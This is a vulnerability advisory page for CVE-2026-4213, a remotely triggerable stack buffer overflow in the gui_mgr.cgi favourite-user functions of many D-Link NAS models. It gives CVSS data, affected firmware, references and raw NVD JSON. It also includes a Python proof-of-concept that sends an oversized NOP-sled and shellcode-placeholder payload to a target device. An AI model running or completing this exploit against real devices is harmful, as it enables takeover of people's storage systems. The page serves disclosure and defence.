CVE-2026-4213

Description

A vulnerability was detected in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. This vulnerability affects the function cgi_myfavorite_del_user/cgi_myfavorite_verify of the file /cgi-bin/gui_mgr.cgi. Performing a manipulation results in stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dnr-202l_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dnr-326_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dnr-326:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-1100-4_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-1100-4:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-120_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-120:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-1200-05_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-1200-05:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DNS-120 (固件 <= 20260205)

D-Link DNR-202L (固件 <= 20260205)

D-Link DNS-315L (固件 <= 20260205)

D-Link DNS-320 (固件 <= 20260205)

D-Link DNS-320L (固件 <= 20260205)

D-Link DNS-320LW (固件 <= 20260205)

D-Link DNS-321 (固件 <= 20260205)

D-Link DNR-322L (固件 <= 20260205)

D-Link DNS-323 (固件 <= 20260205)

D-Link DNS-325 (固件 <= 20260205)

D-Link DNS-326 (固件 <= 20260205)

D-Link DNS-327L (固件 <= 20260205)

D-Link DNR-326 (固件 <= 20260205)

D-Link DNS-340L (固件 <= 20260205)

D-Link DNS-343 (固件 <= 20260205)

D-Link DNS-345 (固件 <= 20260205)

D-Link DNS-726-4 (固件 <= 20260205)

D-Link DNS-1100-4 (固件 <= 20260205)

D-Link DNS-1200-05 (固件 <= 20260205)

D-Link DNS-1550-04 (固件 <= 20260205)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-4213 PoC - D-Link NAS Buffer Overflow
Target: /cgi-bin/gui_mgr.cgi
Functions: cgi_myfavorite_del_user, cgi_myfavorite_verify
"""

import requests
import sys

TARGET_URL = "http://target:8080/cgi-bin/gui_mgr.cgi"

def create_overflow_payload(length=1000):
    """Generate buffer overflow payload"""
    # NOP sled for better shellcode placement
    nop_sled = b'\x90' * 200
    # Placeholder shellcode - should be replaced with architecture-specific payload
    shellcode = b'\xcc' * 100  # INT3 for debugging
    # Overflow pattern to reach return address
    overflow = b'A' * (length - len(nop_sled) - len(shellcode))
    # Target return address (needs to be adjusted based on target)
    return_address = b'\x42\x42\x42\x42'
    return nop_sled + shellcode + overflow + return_address

def exploit_cgi_myfavorite_del_user(target_ip):
    """Exploit cgi_myfavorite_del_user function"""
    url = f"http://{target_ip}:8080/cgi-bin/gui_mgr.cgi"
    payload = create_overflow_payload(1000)
    
    params = {
        'cgi_myfavorite_del_user': payload.decode('latin-1')
    }
    
    try:
        response = requests.get(url, params=params, timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Payload length: {len(payload)}")
        return response.status_code
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

def exploit_cgi_myfavorite_verify(target_ip):
    """Exploit cgi_myfavorite_verify function"""
    url = f"http://{target_ip}:8080/cgi-bin/gui_mgr.cgi"
    payload = create_overflow_payload(1000)
    
    params = {
        'cgi_myfavorite_verify': payload.decode('latin-1')
    }
    
    try:
        response = requests.get(url, params=params, timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Payload length: {len(payload)}")
        return response.status_code
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve_2026_4213_poc.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Starting CVE-2026-4213 exploitation against {target}")
    exploit_cgi_myfavorite_del_user(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4213
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4213
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4213/
[4] VulDB https://vuldb.com/cve/CVE-2026-4213
[5] https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_162/162.md
[6] https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_163/163.md
[7] https://vuldb.com/?ctiid.351124
[8] https://vuldb.com/?id.351124
[9] https://vuldb.com/?submit.770443
[10] https://vuldb.com/?submit.770444
[11] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4213", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:07.927", "lastModified": "2026-03-19T14:31:16.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. This vulnerability affects the function cgi_myfavorite_del_user/cgi_myfavorite_verify of the file /cgi-bin/gui_mgr.cgi. Performing a manipulation results in stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 y DNS-1550-04 hasta 20260205. Esta vulnerabilidad afecta a la función cgi_myfavorite_del_user/cgi_myfavorite_verify del archivo /cgi-bin/gui_mgr.cgi. Realizar una manipulación resulta en desbordamiento de búfer basado en pila. El ataque puede ser iniciado remotamente. El exploit ahora es público y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dnr-202l_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026-02-05", "matchCriteriaId": "E20A03F5-6985-4917-8E5B-48963FB62AF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": ... (truncated)